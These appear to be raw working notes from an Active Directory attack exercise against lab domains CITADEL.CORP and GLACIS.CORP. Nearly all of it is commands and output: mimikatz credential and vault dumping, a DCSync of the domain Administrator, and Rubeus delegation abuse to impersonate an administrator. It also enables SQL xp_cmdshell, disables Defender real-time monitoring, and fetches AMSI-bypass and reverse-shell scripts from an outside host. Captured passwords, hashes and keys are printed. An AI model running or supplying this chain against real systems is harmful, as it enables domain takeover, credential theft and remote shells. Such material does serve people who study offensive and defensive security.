From studentuser, got rights on the CompanyAdministrators group
Got user sharemanager
* Username : sharemanager
* Domain : CITADEL.CORP
* Password : Us3dForControllingFilesAcrossCitadel!
* Key List :
The vault may be helpful at some point
PS C:\Users\studentuser\Desktop\shared> .\BetterSafetyKatz.exe "token::elevate" "vault::cred /patch" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!
  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com   ***/
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
604 {0;000003e7} 1 D 16181 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;0018cac5} 3 F 2061647 CITADEL\studentuser S-1-5-21-253487801-221673152-1815095224-1113 (14g,24p) Primary
* Thread Token : {0;000003e7} 1 D 2143679 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # vault::cred /patch
TargetName : WindowsLive:target=virtualapp/didlogical / <NULL>
UserName : 02uljdsqbshuulqj
Comment : PersistedCredential
Type : 1 - generic
Persist : 2 - local_machine
Flags : 00000000
Credential :
Attributes : 32
mimikatz(commandline) # exit
Bye
SQL
Invoke-SqlCmd -Query "exec sp_serveroption @server='sqlsrv3.glacis.corp',@optname='rpc out',@optvalue='TRUE'"
Invoke-SqlCmd -Query "exec sp_serveroption @server='sqlsrv3.glacis.corp',@optname='rpc',@optvalue='TRUE'"
Got dbmaster
* Username : dbmaster
* Domain : GLACIS.CORP
* Password : (null)
* Key List :
CD (constrained delegation)
.\Rubeus.exe s4u /user:dbmaster /aes256:842cd67c2aa74fa6c6472796180f5063b7437a3fdbfb3f9903b0d0741f17e959 /impersonateuser:administrator /msdsspn:time/glacis-dc.glacis.corp /altservice:rpcss,host,http /nowrap /ptt
q
Get-SQLQuery -Instance sqlsrv3.glacis.corp -Verbose -Query 'EXECUTE AS LOGIN = ''sqlsrv3adm''; EXECUTE AS LOGIN = ''sa'';exec xp_cmdshell ''powershell -c "iex(iwr http://192.168.100.1/sbloggingbypass.txt -UseBasicParsing);iex(iwr http://192.168.100.1/amsibypass.txt -UseBasicParsing);iex(iwr http://192.168.100.1/Invoke-PowerShellTcp.ps1 -UseBasicParsing)"'''
test
Get-SQLQuery -Instance sqlsrv3.glacis.corp -Verbose -Query "EXECUTE AS LOGIN = 'sqlsrv3adm'; EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master..xp_cmdshell 'powershell /c whoami';"
PS C:\users\public> .\BetterSafetyKatz.exe "lsadump::dcsync /user:glacis\Administrator /domain:glacis.corp" "exit"
mimikatz(commandline) # lsadump::dcsync /user:glacis\Administrator /domain:glacis.corp
[DC] 'glacis.corp' will be the domain
[DC] 'glacis-dc.glacis.corp' will be the DC server
[DC] 'glacis\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/9/2022 3:25:03 AM
Object Security ID : S-1-5-21-525452939-2440030252-1192466273-500
Object Relative ID : 500
Credentials:
Set-MpPreference -DisableRealtimeMonitoring $true
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 40139 (00000000:00009ccb)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/16/2024 3:50:53 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : GLACIS-DC$
* Domain : GLACIS
* NTLM : a28e4e5320b7cb795d01f7226b496f53
* SHA1 : 8a88a749e79983cbc4a0126a81316c264a54f4a9
tspkg :
wdigest :
* Username : GLACIS-DC$
* Domain : GLACIS
* Password : (null)
kerberos :
* Username : GLACIS-DC$
* Domain : glacis.corp
ssp :
credman :
Add-DomainGroupMember -Identity "GroupName" -Members "UserName"
SELECT DISTINCT b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';